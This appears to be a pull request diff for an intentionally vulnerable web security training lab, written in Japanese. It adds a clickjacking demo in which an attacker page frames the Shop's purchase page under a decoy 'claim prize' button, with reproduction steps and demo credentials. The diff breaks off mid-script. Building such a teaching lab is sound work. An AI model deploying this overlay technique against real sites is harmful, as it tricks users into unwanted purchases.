### PR TITLE
Add clickjacking hands-on flow

### DIFF
--- a/README.md
+++ b/README.md
@@ -59,6 +59,9 @@ docker compose up
 - **セッションハイジャック**:
   - `httpOnly: false` のセッションCookieを、保存型XSSから `document.cookie` で盗める
   - Attacker の `/session-hijack` で stolen cookie を確認し、`/orders` へ再利用できる
+- **クリックジャッキング**:
+  - Shop がフレーム埋め込みを禁止していないため、Attacker の `/clickjacking` から `/purchase/1` を透明 iframe で重ねられる
+  - 被害者に「景品ボタン」を押させるだけで、実際には Shop の購入ボタンをクリックさせられる
 - **SQL Injection**:
   - `/login` のユーザー名/パスワードが文字列結合SQL
   - `/search` の `q` が文字列結合SQL（UNION/コメント構文が有効）
@@ -71,6 +74,14 @@ docker compose up
   - Attacker の `/auto-purchase` で購入リクエストを自動送信
 
 詳しい手順は起動後に画面内の「Hands-on」リンクを参照してください（Shop側に手順を表示します）。
+
+## クリックジャッキングの再現手順
+
+1. `alice / password123` で Shop にログインする
+2. `http://localhost:9000/clickjacking` を開く
+3. 表示された「景品を受け取る」位置をクリックする
+4. `http://localhost:8000/orders` を開く
+5. 自分では Shop の購入画面を操作していないのに、注文が 1 件追加されていることを確認する
 
 ## セッションハイジャックの再現手順
 

--- a/README.md
+++ b/README.md
@@ -60,8 +60,8 @@ docker compose up
   - `httpOnly: false` のセッションCookieを、保存型XSSから `document.cookie` で盗める
   - Attacker の `/session-hijack` で stolen cookie を確認し、`/orders` へ再利用できる
 - **クリックジャッキング**:
-  - Shop がフレーム埋め込みを禁止していないため、Attacker の `/clickjacking` から `/purchase/1` を透明 iframe で重ねられる
-  - 被害者に「景品ボタン」を押させるだけで、実際には Shop の購入ボタンをクリックさせられる
+  - Shop がフレーム埋め込みを禁止していないため、Attacker の `/clickjacking` から `/purchase/1` を iframe で重ねられる
+  - CSRF のように攻撃者が直接 POST するのではなく、被害者自身に Shop の本物の購入ボタンを押させられる
 - **SQL Injection**:
   - `/login` のユーザー名/パスワードが文字列結合SQL
   - `/search` の `q` が文字列結合SQL（UNION/コメント構文が有効）
@@ -79,9 +79,12 @@ docker compose up
 
 1. `alice / password123` で Shop にログインする
 2. `http://localhost:9000/clickjacking` を開く
-3. 表示された「景品を受け取る」位置をクリックする
-4. `http://localhost:8000/orders` を開く
-5. 自分では Shop の購入画面を操作していないのに、注文が 1 件追加されていることを確認する
+3. 「本物の Shop 画面を表示する」を押し、背後に `/purchase/1` の実画面が埋め込まれていることを確認する
+4. 「隠してもう一度試す」で戻し、表示された「景品を受け取る」位置をクリックする
+5. `http://localhost:8000/orders` を開く
+6. 自分では Shop の購入画面を操作していないのに、注文が 1 件追加されていることを確認する
+
+このシナリオでは、攻撃者ページが `/purchase` に直接リクエストしているわけではありません。被害者のクリックが iframe 内の本物の Shop UI に到達している点が CSRF との違いです。
 
 ## セッションハイジャックの再現手順
 

--- a/README.md
+++ b/README.md
@@ -49,7 +49,8 @@ docker compose up
 ### Attacker
 
 - `PORT`（既定: 9000）
-- `TARGET_BASE`（既定: `http://localhost:8000`。攻撃対象のShop URL）
+- `TARGET_BASE`（既定: `http://localhost:8000`。ブラウザから見える Shop URL）
+- `TARGET_INTERNAL_BASE`（既定: `TARGET_BASE` と同じ。Attacker サーバーが中継で使う Shop URL。Docker Compose では `http://shop:8000`）
 
 ## 体験に使う導線（概要）
 

--- a/apps/attacker/Dockerfile
+++ b/apps/attacker/Dockerfile
@@ -8,7 +8,8 @@ COPY server.js /app/server.js
 COPY public /app/public
 
 ENV PORT=9000
-ENV TARGET_BASE=http://shop:8000
+ENV TARGET_BASE=http://localhost:8000
+ENV TARGET_INTERNAL_BASE=http://shop:8000
 EXPOSE 9000
 
 CMD ["node", "server.js"]

--- a/apps/attacker/public/clickjacking.html
+++ b/apps/attacker/public/clickjacking.html
@@ -11,21 +11,21 @@
         min-height: 100vh;
         font-family: Georgia, "Times New Roman", serif;
         background:
-          radial-gradient(circle at top, rgba(255, 210, 90, 0.22), transparent 35%),
-          linear-gradient(180deg, #2b1208 0%, #120b09 50%, #070707 100%);
-        color: #fff6df;
+          radial-gradient(circle at top, rgba(255, 214, 112, 0.2), transparent 32%),
+          linear-gradient(180deg, #2a1208 0%, #130b09 50%, #080808 100%);
+        color: #fff5dd;
       }
       .shell {
-        max-width: 1120px;
+        max-width: 1180px;
         margin: 0 auto;
-        padding: 40px 20px 72px;
+        padding: 36px 20px 72px;
       }
       .hero {
         border-radius: 28px;
-        border: 1px solid rgba(255, 224, 150, 0.18);
-        background: linear-gradient(145deg, rgba(255, 255, 255, 0.08), rgba(255, 170, 70, 0.04));
-        box-shadow: 0 30px 90px rgba(0, 0, 0, 0.38);
         overflow: hidden;
+        border: 1px solid rgba(255, 224, 148, 0.16);
+        background: linear-gradient(140deg, rgba(255, 255, 255, 0.08), rgba(255, 160, 60, 0.05));
+        box-shadow: 0 30px 90px rgba(0, 0, 0, 0.4);
       }
       .hero-head {
         padding: 28px 32px 0;
@@ -41,135 +41,174 @@
       }
       h1 {
         margin: 16px 0 10px;
-        font-size: clamp(34px, 5vw, 60px);
-        line-height: 0.96;
+        font-size: clamp(34px, 5vw, 58px);
+        line-height: 0.95;
       }
       .lead {
         margin: 0;
-        max-width: 720px;
-        color: #f0dfc1;
+        max-width: 760px;
+        color: #eedfc1;
         font-size: 18px;
         line-height: 1.6;
       }
       .hero-grid {
         display: grid;
-        grid-template-columns: minmax(0, 1.2fr) minmax(320px, 0.8fr);
+        grid-template-columns: minmax(0, 1.3fr) minmax(300px, 0.7fr);
         gap: 24px;
         padding: 28px 32px 32px;
       }
       .stage-card,
       .explain-card {
         border-radius: 24px;
-        background: rgba(9, 9, 11, 0.36);
+        background: rgba(10, 10, 12, 0.34);
         border: 1px solid rgba(255, 232, 173, 0.12);
       }
       .stage-card {
         padding: 22px;
       }
-      .fake-surface {
-        position: relative;
-        height: 420px;
-        border-radius: 22px;
-        overflow: hidden;
-        background:
-          radial-gradient(circle at top left, rgba(255, 255, 255, 0.22), transparent 30%),
-          linear-gradient(135deg, #ff932f, #ef4637 58%, #80220f 100%);
-        box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.14);
+      .legend {
+        display: flex;
+        flex-wrap: wrap;
+        gap: 10px;
+        margin-bottom: 14px;
       }
-      .promo-copy {
+      .toggle-row {
+        display: flex;
+        justify-content: flex-end;
+        margin-bottom: 14px;
+      }
+      .toggle-row button {
+        appearance: none;
+        border: 0;
+        border-radius: 999px;
+        padding: 10px 14px;
+        font: inherit;
+        font-weight: 700;
+        cursor: pointer;
+        background: rgba(255, 255, 255, 0.12);
+        color: #fff2ce;
+      }
+      .chip {
+        display: inline-flex;
+        align-items: center;
+        gap: 8px;
+        border-radius: 999px;
+        padding: 8px 12px;
+        font-size: 13px;
+        background: rgba(255, 255, 255, 0.06);
+      }
+      .swatch {
+        width: 12px;
+        height: 12px;
+        border-radius: 999px;
+      }
+      .swatch-real {
+        background: #6dd3ff;
+      }
+      .swatch-fake {
+        background: #ffbf47;
+      }
+      .demo-frame {
+        position: relative;
+        height: 650px;
+        border-radius: 24px;
+        overflow: hidden;
+        background: #0d1016;
+        box-shadow: inset 0 0 0 1px rgba(255, 255, 255, 0.06);
+      }
+      .shop-frame {
         position: absolute;
         inset: 0;
-        padding: 34px 30px;
+        width: 100%;
+        height: 100%;
+        border: 0;
+        background: #fff;
       }
-      .promo-copy h2 {
+      .overlay-layer {
+        position: absolute;
+        inset: 0;
+        pointer-events: none;
+        background: rgba(255, 255, 255, 0.85);
+      }
+      .overlay-layer.is-hidden {
+        display: none;
+      }
+      .overlay-tag {
+        position: absolute;
+        left: 18px;
+        top: 18px;
+        padding: 8px 12px;
+        border-radius: 999px;
+        background: rgba(255, 191, 71, 0.92);
+        color: #3d1806;
+        font-size: 13px;
+        font-weight: 700;
+        letter-spacing: 0.06em;
+        box-shadow: 0 10px 24px rgba(0, 0, 0, 0.22);
+      }
+      .overlay-panel {
+        position: absolute;
+        left: 24px;
+        top: 88px;
+        width: min(460px, calc(100% - 48px));
+        padding: 24px 24px 34px;
+        border-radius: 24px;
+        background: linear-gradient(140deg, rgba(255, 161, 56, 0.92), rgba(237, 74, 55, 0.92));
+        color: #fffdf5;
+        box-shadow: 0 24px 60px rgba(86, 23, 8, 0.35);
+        backdrop-filter: blur(8px);
+      }
+      .overlay-panel h2 {
         margin: 0 0 10px;
         font-size: 34px;
+        line-height: 1;
       }
-      .promo-copy p {
-        max-width: 380px;
+      .overlay-panel p {
         margin: 0;
         line-height: 1.6;
-        color: rgba(255, 248, 233, 0.96);
+        color: rgba(255, 248, 236, 0.94);
       }
-      .decoy-button {
+      .decoy-cta {
         position: absolute;
-        left: 30px;
-        top: 212px;
-        width: 320px;
-        height: 68px;
+        left: 50px;
+        top: 515px;
+        width: 300px;
+        height: 62px;
         border-radius: 999px;
         display: flex;
         align-items: center;
         justify-content: center;
-        font-size: 28px;
+        font-size: 26px;
         font-weight: 700;
-        letter-spacing: 0.06em;
-        color: #fffef5;
+        letter-spacing: 0.04em;
+        color: #fffef6;
         background:
-          linear-gradient(160deg, rgba(255, 255, 255, 0.2), rgba(255, 255, 255, 0.04)),
-          linear-gradient(135deg, #ffd041, #ff8f1f);
-        box-shadow: 0 20px 45px rgba(94, 17, 5, 0.32);
-        pointer-events: none;
-        text-shadow: 0 2px 12px rgba(0, 0, 0, 0.18);
+          linear-gradient(160deg, rgba(255, 255, 255, 0.28), rgba(255, 255, 255, 0.08)),
+          linear-gradient(135deg, #ffd041, #ff9825);
+        box-shadow: 0 20px 44px rgba(96, 23, 7, 0.36);
       }
-      .spotlight {
+      .target-callout {
         position: absolute;
-        left: 22px;
-        top: 198px;
-        width: 336px;
-        height: 96px;
-        border: 2px dashed rgba(255, 250, 230, 0.9);
-        border-radius: 24px;
-        box-shadow: 0 0 0 999px rgba(15, 9, 7, 0.2);
-        pointer-events: none;
+        left: 34px;
+        top: 494px;
+        width: 332px;
+        height: 104px;
+        border: 2px dashed rgba(255, 245, 214, 0.95);
+        border-radius: 26px;
+        box-shadow: 0 0 0 999px rgba(12, 10, 9, 0.08);
       }
-      .frame-wrap {
+      .callout-label {
         position: absolute;
-        inset: 0;
-      }
-      .trap-frame {
-        position: absolute;
-        top: -72px;
-        left: -22px;
-        width: 760px;
-        height: 760px;
-        border: 0;
-        opacity: 0.03;
-        transition: opacity 160ms ease, transform 160ms ease;
-      }
-      .fake-surface.revealed .trap-frame {
-        opacity: 0.96;
-      }
-      .fake-surface.revealed .decoy-button,
-      .fake-surface.revealed .spotlight {
-        opacity: 0.18;
-      }
-      .toolbar {
-        display: flex;
-        flex-wrap: wrap;
-        gap: 12px;
-        margin-top: 18px;
-      }
-      .toolbar button {
-        border: 0;
-        border-radius: 999px;
-        padding: 12px 18px;
-        font: inherit;
-        font-weight: 700;
-        cursor: pointer;
-      }
-      .toolbar .secondary {
-        background: rgba(255, 255, 255, 0.1);
-        color: #fff2ce;
-      }
-      .toolbar .primary {
-        background: linear-gradient(135deg, #ffd041, #ff932f);
-        color: #381705;
-      }
-      .status {
-        margin-top: 14px;
-        color: #e9d8b6;
-        font-size: 14px;
+        left: 372px;
+        top: 510px;
+        max-width: 210px;
+        padding: 12px 14px;
+        border-radius: 16px;
+        background: rgba(18, 14, 12, 0.78);
+        border: 1px solid rgba(255, 228, 163, 0.24);
+        color: #fff1cb;
+        font-size: 13px;
+        line-height: 1.5;
       }
       .explain-card {
         padding: 22px 22px 18px;
@@ -212,7 +251,7 @@
         padding: 2px 6px;
         border-radius: 6px;
       }
-      @media (max-width: 920px) {
+      @media (max-width: 960px) {
         .hero-grid {
           grid-template-columns: 1fr;
         }
@@ -226,31 +265,36 @@
         .stage-card {
           padding: 16px;
         }
-        .fake-surface {
-          height: 460px;
+        .demo-frame {
+          height: 620px;
         }
-        .promo-copy {
-          padding: 24px 20px;
+        .overlay-panel {
+          left: 18px;
+          top: 70px;
+          width: calc(100% - 36px);
+          padding: 18px 18px 26px;
         }
-        .promo-copy h2 {
+        .overlay-panel h2 {
           font-size: 28px;
         }
-        .decoy-button {
+        .decoy-cta {
+          left: 26px;
+          right: 26px;
+          width: auto;
+          top: 518px;
+          font-size: 22px;
+        }
+        .target-callout {
+          left: 12px;
+          right: 12px;
+          width: auto;
+          top: 496px;
+        }
+        .callout-label {
           left: 20px;
-          width: calc(100% - 40px);
-          top: 232px;
-          font-size: 24px;
-        }
-        .spotlight {
-          left: 14px;
-          top: 218px;
-          width: calc(100% - 28px);
-        }
-        .trap-frame {
-          top: -58px;
-          left: -110px;
-          transform: scale(0.92);
-          transform-origin: top left;
+          right: 20px;
+          top: 432px;
+          max-width: none;
         }
       }
     </style>
@@ -260,69 +304,71 @@
       <section class="hero">
         <div class="hero-head">
           <span class="eyebrow">Clickjacking Demo</span>
-          <h1>これは CSRF ではなく、<br />本物の Shop 画面を押させるデモです</h1>
+          <h1>本物の Shop を見せたまま、<br />その上に偽UIを重ねる</h1>
           <p class="lead">
-            このページ自身は <code>/purchase</code> に直接 POST しません。背後に埋め込んだ
-            <code>/purchase/1</code> の本物の「購入する」を、被害者のクリックで押させます。
+            下に見えているのは iframe で埋め込まれた本物の Shop 画面です。上に載っているオレンジのUIは攻撃者が重ねた偽物で、被害者のクリックは背後の本物のボタンへ届きます。
           </p>
         </div>
 
         <div class="hero-grid">
           <section class="stage-card">
-            <div class="fake-surface" id="fakeSurface">
-              <div class="promo-copy">
-                <h2>限定キャンペーン</h2>
-                <p>
-                  表向きはプレゼント応募ページに見せていますが、実際のクリック先は埋め込まれた
-                  Shop の購入ボタンです。
-                </p>
-              </div>
-              <div class="frame-wrap">
-                <iframe
-                  class="trap-frame"
-                  id="trapFrame"
-                  title="embedded real shop purchase page"
-                  loading="eager"
-                ></iframe>
-              </div>
-              <div class="decoy-button" aria-hidden="true">景品を受け取る</div>
-              <div class="spotlight" aria-hidden="true"></div>
+            <div class="legend">
+              <div class="chip"><span class="swatch swatch-real"></span> 下層: 本物の Shop 画面</div>
+              <div class="chip"><span class="swatch swatch-fake"></span> 上層: 攻撃者が重ねた偽 UI</div>
+            </div>
+            <div class="toggle-row">
+              <button id="overlayToggle" type="button">上層を隠す</button>
             </div>
 
-            <div class="toolbar">
-              <button class="secondary" id="revealButton" type="button">本物の Shop 画面を表示する</button>
-              <button class="primary" id="resetButton" type="button">隠してもう一度試す</button>
-            </div>
-            <div class="status" id="statusText">
-              いま見えている大きなボタンの位置に、Shop の本物の「購入する」が重なっています。
+            <div class="demo-frame">
+              <iframe
+                class="shop-frame"
+                id="trapFrame"
+                title="embedded real shop purchase page"
+                loading="eager"
+              ></iframe>
+
+              <div class="overlay-layer" id="overlayLayer">
+                <div class="overlay-tag">偽UIレイヤー</div>
+                <div class="overlay-panel">
+                  <h2>限定プレゼント</h2>
+                  <p>
+                    ここは応募ページに見えますが、下には本物の EC サイトが表示されています。重ねたボタン位置をクリックすると、実際には Shop の購入ボタンが押されます。
+                  </p>
+                </div>
+                <div class="target-callout" aria-hidden="true"></div>
+                <div class="decoy-cta" aria-hidden="true">景品を受け取る</div>
+                <div class="callout-label">
+                  この枠内では、偽の「景品ボタン」が本物の Shop の「購入する」上に重なっています。
+                </div>
+              </div>
             </div>
           </section>
 
           <aside class="explain-card">
-            <h3>CSRF との違い</h3>
+            <h3>何が起きているか</h3>
             <div class="compare">
               <div class="compare-row">
                 <strong>CSRF</strong>
-                攻撃者ページが被害者ブラウザから勝手にリクエストを送ります。被害者は正規サイトの画面を押していません。
+                攻撃者が被害者ブラウザから勝手にリクエストを送ります。正規サイトの画面は見えていません。
               </div>
               <div class="compare-row">
                 <strong>Clickjacking</strong>
-                攻撃者ページが正規サイトを iframe で埋め込み、被害者自身に本物の UI を押させます。
+                本物のサイトを iframe で表示したまま、その上に偽 UI を重ねます。被害者はだまされて本物の UI を押します。
               </div>
             </div>
 
             <ol class="steps">
               <li>Shop で <code>alice / password123</code> でログインする</li>
-              <li>まずは「本物の Shop 画面を表示する」を押して、背後に <code>/purchase/1</code> があることを見る</li>
-              <li>「隠してもう一度試す」で元に戻す</li>
-              <li>大きな「景品を受け取る」位置をクリックする</li>
-              <li>Shop の <code>/orders</code> で注文が増えていることを確認する</li>
+              <li>このページを開き、下に本物の Shop 画面が見えていることを確認する</li>
+              <li>オレンジの「景品を受け取る」位置をクリックする</li>
+              <li>Shop の <code>/orders</code> を開き、注文が増えていることを確認する</li>
             </ol>
 
             <div class="debug">
               <p style="margin-top: 0;"><strong>【学習用デバッグ表示】</strong></p>
               <p>埋め込み先: <code id="targetPath"></code></p>
-              <p>ポイント: このページ内に <code>form.submit()</code> はなく、クリック先は iframe 内の Shop です。</p>
+              <p>このページ自体は <code>/purchase</code> に直接 POST しません。クリック先は iframe 内の Shop です。</p>
             </div>
           </aside>
         </div>
@@ -334,29 +380,20 @@
         window.__CLICKJACKING_TARGET__ || new URL("/purchase/1", window.__TARGET_BASE__).toString();
       const frame = document.getElementById("trapFrame");
       const targetPath = document.getElementById("targetPath");
-      const fakeSurface = document.getElementById("fakeSurface");
-      const revealButton = document.getElementById("revealButton");
-      const resetButton = document.getElementById("resetButton");
-      const statusText = document.getElementById("statusText");
-
+      const overlayLayer = document.getElementById("overlayLayer");
+      const overlayToggle = document.getElementById("overlayToggle");
       if (frame) {
         frame.src = clickjackingTarget;
       }
       if (targetPath) {
         targetPath.textContent = clickjackingTarget;
       }
-
-      if (revealButton && fakeSurface && statusText) {
-        revealButton.addEventListener("click", () => {
-          fakeSurface.classList.add("revealed");
-          statusText.textContent = "背後の iframe を可視化しました。見えているのは Shop の本物の購入画面です。";
-        });
-      }
-
-      if (resetButton && fakeSurface && statusText) {
-        resetButton.addEventListener("click", () => {
-          fakeSurface.classList.remove("revealed");
-          statusText.textContent = "いま見えている大きなボタンの位置に、Shop の本物の「購入する」が重なっています。";
+      if (overlayLayer && overlayToggle) {
+        overlayToggle.addEventListener("click", () => {
+          overlayLayer.classList.toggle("is-hidden");
+          overlayToggle.textContent = overlayLayer.classList.contains("is-hidden")
+            ? "上層を表示する"
+            : "上層を隠す";
         });
       }
     </script>

--- a/apps/attacker/public/clickjacking.html
+++ b/apps/attacker/public/clickjacking.html
@@ -11,23 +11,24 @@
         min-height: 100vh;
         font-family: Georgia, "Times New Roman", serif;
         background:
-          radial-gradient(circle at top, rgba(255, 214, 10, 0.25), transparent 40%),
-          linear-gradient(180deg, #2d1208 0%, #140b07 50%, #070707 100%);
-        color: #fff9e6;
+          radial-gradient(circle at top, rgba(255, 210, 90, 0.22), transparent 35%),
+          linear-gradient(180deg, #2b1208 0%, #120b09 50%, #070707 100%);
+        color: #fff6df;
       }
       .shell {
-        max-width: 980px;
+        max-width: 1120px;
         margin: 0 auto;
-        padding: 48px 20px 72px;
+        padding: 40px 20px 72px;
       }
       .hero {
-        position: relative;
+        border-radius: 28px;
+        border: 1px solid rgba(255, 224, 150, 0.18);
+        background: linear-gradient(145deg, rgba(255, 255, 255, 0.08), rgba(255, 170, 70, 0.04));
+        box-shadow: 0 30px 90px rgba(0, 0, 0, 0.38);
         overflow: hidden;
-        border-radius: 24px;
-        border: 1px solid rgba(255, 220, 120, 0.25);
-        background: linear-gradient(135deg, rgba(255, 244, 202, 0.12), rgba(255, 177, 66, 0.06));
-        box-shadow: 0 24px 80px rgba(0, 0, 0, 0.45);
-        padding: 36px;
+      }
+      .hero-head {
+        padding: 28px 32px 0;
       }
       .eyebrow {
         display: inline-block;
@@ -39,62 +40,171 @@
         font-size: 12px;
       }
       h1 {
-        margin: 16px 0 12px;
-        font-size: clamp(36px, 7vw, 64px);
-        line-height: 0.95;
+        margin: 16px 0 10px;
+        font-size: clamp(34px, 5vw, 60px);
+        line-height: 0.96;
       }
       .lead {
-        max-width: 560px;
         margin: 0;
-        color: #f2dfc5;
+        max-width: 720px;
+        color: #f0dfc1;
         font-size: 18px;
         line-height: 1.6;
       }
-      .stage {
-        position: relative;
-        margin-top: 32px;
-        width: min(100%, 580px);
-        height: 220px;
+      .hero-grid {
+        display: grid;
+        grid-template-columns: minmax(0, 1.2fr) minmax(320px, 0.8fr);
+        gap: 24px;
+        padding: 28px 32px 32px;
       }
-      .bait {
+      .stage-card,
+      .explain-card {
+        border-radius: 24px;
+        background: rgba(9, 9, 11, 0.36);
+        border: 1px solid rgba(255, 232, 173, 0.12);
+      }
+      .stage-card {
+        padding: 22px;
+      }
+      .fake-surface {
+        position: relative;
+        height: 420px;
+        border-radius: 22px;
+        overflow: hidden;
+        background:
+          radial-gradient(circle at top left, rgba(255, 255, 255, 0.22), transparent 30%),
+          linear-gradient(135deg, #ff932f, #ef4637 58%, #80220f 100%);
+        box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.14);
+      }
+      .promo-copy {
         position: absolute;
         inset: 0;
+        padding: 34px 30px;
+      }
+      .promo-copy h2 {
+        margin: 0 0 10px;
+        font-size: 34px;
+      }
+      .promo-copy p {
+        max-width: 380px;
+        margin: 0;
+        line-height: 1.6;
+        color: rgba(255, 248, 233, 0.96);
+      }
+      .decoy-button {
+        position: absolute;
+        left: 30px;
+        top: 212px;
+        width: 320px;
+        height: 68px;
+        border-radius: 999px;
         display: flex;
         align-items: center;
         justify-content: center;
-        border-radius: 24px;
-        background:
-          linear-gradient(160deg, rgba(255, 255, 255, 0.18), rgba(255, 255, 255, 0.02)),
-          linear-gradient(135deg, #ff8e2b, #ff3f34);
-        color: #fffef6;
-        font-size: 34px;
+        font-size: 28px;
         font-weight: 700;
         letter-spacing: 0.06em;
-        box-shadow: 0 18px 50px rgba(255, 80, 45, 0.35);
-        text-shadow: 0 2px 14px rgba(0, 0, 0, 0.25);
+        color: #fffef5;
+        background:
+          linear-gradient(160deg, rgba(255, 255, 255, 0.2), rgba(255, 255, 255, 0.04)),
+          linear-gradient(135deg, #ffd041, #ff8f1f);
+        box-shadow: 0 20px 45px rgba(94, 17, 5, 0.32);
+        pointer-events: none;
+        text-shadow: 0 2px 12px rgba(0, 0, 0, 0.18);
       }
-      .hint {
+      .spotlight {
         position: absolute;
-        left: 24px;
-        right: 24px;
-        bottom: 18px;
-        color: rgba(255, 245, 214, 0.92);
-        font-size: 14px;
+        left: 22px;
+        top: 198px;
+        width: 336px;
+        height: 96px;
+        border: 2px dashed rgba(255, 250, 230, 0.9);
+        border-radius: 24px;
+        box-shadow: 0 0 0 999px rgba(15, 9, 7, 0.2);
+        pointer-events: none;
+      }
+      .frame-wrap {
+        position: absolute;
+        inset: 0;
       }
       .trap-frame {
         position: absolute;
-        top: -202px;
-        left: -1px;
-        width: 640px;
-        height: 560px;
+        top: -72px;
+        left: -22px;
+        width: 760px;
+        height: 760px;
         border: 0;
-        opacity: 0.02;
+        opacity: 0.03;
+        transition: opacity 160ms ease, transform 160ms ease;
+      }
+      .fake-surface.revealed .trap-frame {
+        opacity: 0.96;
+      }
+      .fake-surface.revealed .decoy-button,
+      .fake-surface.revealed .spotlight {
+        opacity: 0.18;
+      }
+      .toolbar {
+        display: flex;
+        flex-wrap: wrap;
+        gap: 12px;
+        margin-top: 18px;
+      }
+      .toolbar button {
+        border: 0;
+        border-radius: 999px;
+        padding: 12px 18px;
+        font: inherit;
+        font-weight: 700;
+        cursor: pointer;
+      }
+      .toolbar .secondary {
+        background: rgba(255, 255, 255, 0.1);
+        color: #fff2ce;
+      }
+      .toolbar .primary {
+        background: linear-gradient(135deg, #ffd041, #ff932f);
+        color: #381705;
+      }
+      .status {
+        margin-top: 14px;
+        color: #e9d8b6;
+        font-size: 14px;
+      }
+      .explain-card {
+        padding: 22px 22px 18px;
+      }
+      .explain-card h3 {
+        margin: 0 0 14px;
+        font-size: 22px;
+      }
+      .compare {
+        display: grid;
+        gap: 12px;
+      }
+      .compare-row {
+        border-radius: 18px;
+        padding: 14px 16px;
+        background: rgba(255, 255, 255, 0.04);
+      }
+      .compare-row strong {
+        display: block;
+        margin-bottom: 6px;
+        color: #ffe5aa;
+      }
+      .steps {
+        margin: 16px 0 0;
+        padding-left: 18px;
+        color: #e7d6b3;
+      }
+      .steps li {
+        margin-bottom: 8px;
       }
       .debug {
-        margin-top: 28px;
-        border-top: 1px solid rgba(255, 223, 145, 0.18);
-        padding-top: 20px;
-        color: #dcccb0;
+        margin-top: 18px;
+        padding-top: 16px;
+        border-top: 1px solid rgba(255, 227, 150, 0.12);
+        color: #d8c5a0;
         font-size: 14px;
       }
       code {
@@ -102,28 +212,43 @@
         padding: 2px 6px;
         border-radius: 6px;
       }
-      .steps {
-        margin-top: 10px;
-        padding-left: 18px;
-      }
-      .steps li {
-        margin-bottom: 6px;
+      @media (max-width: 920px) {
+        .hero-grid {
+          grid-template-columns: 1fr;
+        }
       }
       @media (max-width: 720px) {
-        .hero {
-          padding: 24px;
+        .hero-head,
+        .hero-grid {
+          padding-left: 20px;
+          padding-right: 20px;
         }
-        .stage {
-          height: 180px;
+        .stage-card {
+          padding: 16px;
         }
-        .bait {
-          font-size: 26px;
-          text-align: center;
-          padding: 0 24px;
+        .fake-surface {
+          height: 460px;
+        }
+        .promo-copy {
+          padding: 24px 20px;
+        }
+        .promo-copy h2 {
+          font-size: 28px;
+        }
+        .decoy-button {
+          left: 20px;
+          width: calc(100% - 40px);
+          top: 232px;
+          font-size: 24px;
+        }
+        .spotlight {
+          left: 14px;
+          top: 218px;
+          width: calc(100% - 28px);
         }
         .trap-frame {
-          top: -218px;
-          left: -54px;
+          top: -58px;
+          left: -110px;
           transform: scale(0.92);
           transform-origin: top left;
         }
@@ -133,31 +258,73 @@
   <body>
     <main class="shell">
       <section class="hero">
-        <span class="eyebrow">Clickjacking Demo</span>
-        <h1>限定特典を受け取る</h1>
-        <p class="lead">
-          派手なボタンに見せかけつつ、背後では別サイトの購入ボタンを押させるデモです。被害者には正規の購入画面がほぼ見えません。
-        </p>
-
-        <div class="stage">
-          <div class="bait" aria-hidden="true">景品を受け取る</div>
-          <div class="hint">1回クリックすると、見えない iframe 上の購入ボタンが押されます。</div>
-          <iframe
-            class="trap-frame"
-            id="trapFrame"
-            title="hidden purchase frame"
-            loading="eager"
-          ></iframe>
+        <div class="hero-head">
+          <span class="eyebrow">Clickjacking Demo</span>
+          <h1>これは CSRF ではなく、<br />本物の Shop 画面を押させるデモです</h1>
+          <p class="lead">
+            このページ自身は <code>/purchase</code> に直接 POST しません。背後に埋め込んだ
+            <code>/purchase/1</code> の本物の「購入する」を、被害者のクリックで押させます。
+          </p>
         </div>
 
-        <div class="debug">
-          <p style="margin-top: 0;"><strong>【学習用デバッグ表示】</strong></p>
-          <p>埋め込み先: <code id="targetPath"></code></p>
-          <ol class="steps">
-            <li>被害者として Shop にログインしておく</li>
-            <li>このページで「景品を受け取る」位置をクリックする</li>
-            <li>Shop の <code>/orders</code> を開いて注文追加を確認する</li>
-          </ol>
+        <div class="hero-grid">
+          <section class="stage-card">
+            <div class="fake-surface" id="fakeSurface">
+              <div class="promo-copy">
+                <h2>限定キャンペーン</h2>
+                <p>
+                  表向きはプレゼント応募ページに見せていますが、実際のクリック先は埋め込まれた
+                  Shop の購入ボタンです。
+                </p>
+              </div>
+              <div class="frame-wrap">
+                <iframe
+                  class="trap-frame"
+                  id="trapFrame"
+                  title="embedded real shop purchase page"
+                  loading="eager"
+                ></iframe>
+              </div>
+              <div class="decoy-button" aria-hidden="true">景品を受け取る</div>
+              <div class="spotlight" aria-hidden="true"></div>
+            </div>
+
+            <div class="toolbar">
+              <button class="secondary" id="revealButton" type="button">本物の Shop 画面を表示する</button>
+              <button class="primary" id="resetButton" type="button">隠してもう一度試す</button>
+            </div>
+            <div class="status" id="statusText">
+              いま見えている大きなボタンの位置に、Shop の本物の「購入する」が重なっています。
+            </div>
+          </section>
+
+          <aside class="explain-card">
+            <h3>CSRF との違い</h3>
+            <div class="compare">
+              <div class="compare-row">
+                <strong>CSRF</strong>
+                攻撃者ページが被害者ブラウザから勝手にリクエストを送ります。被害者は正規サイトの画面を押していません。
+              </div>
+              <div class="compare-row">
+                <strong>Clickjacking</strong>
+                攻撃者ページが正規サイトを iframe で埋め込み、被害者自身に本物の UI を押させます。
+              </div>
+            </div>
+
+            <ol class="steps">
+              <li>Shop で <code>alice / password123</code> でログインする</li>
+              <li>まずは「本物の Shop 画面を表示する」を押して、背後に <code>/purchase/1</code> があることを見る</li>
+              <li>「隠してもう一度試す」で元に戻す</li>
+              <li>大きな「景品を受け取る」位置をクリックする</li>
+              <li>Shop の <code>/orders</code> で注文が増えていることを確認する</li>
+            </ol>
+
+            <div class="debug">
+              <p style="margin-top: 0;"><strong>【学習用デバッグ表示】</strong></p>
+              <p>埋め込み先: <code id="targetPath"></code></p>
+              <p>ポイント: このページ内に <code>form.submit()</code> はなく、クリック先は iframe 内の Shop です。</p>
+            </div>
+          </aside>
         </div>
       </section>
     </main>
@@ -167,11 +334,30 @@
         window.__CLICKJACKING_TARGET__ || new URL("/purchase/1", window.__TARGET_BASE__).toString();
       const frame = document.getElementById("trapFrame");
       const targetPath = document.getElementById("targetPath");
+      const fakeSurface = document.getElementById("fakeSurface");
+      const revealButton = document.getElementById("revealButton");
+      const resetButton = document.getElementById("resetButton");
+      const statusText = document.getElementById("statusText");
+
       if (frame) {
         frame.src = clickjackingTarget;
       }
       if (targetPath) {
         targetPath.textContent = clickjackingTarget;
+      }
+
+      if (revealButton && fakeSurface && statusText) {
+        revealButton.addEventListener("click", () => {
+          fakeSurface.classList.add("revealed");
+          statusText.textContent = "背後の iframe を可視化しました。見えているのは Shop の本物の購入画面です。";
+        });
+      }
+
+      if (resetButton && fakeSurface && statusText) {
+        resetButton.addEventListener("click", () => {
+          fakeSurface.classList.remove("revealed");
+          statusText.textContent = "いま見えている大きなボタンの位置に、Shop の本物の「購入する」が重なっています。";
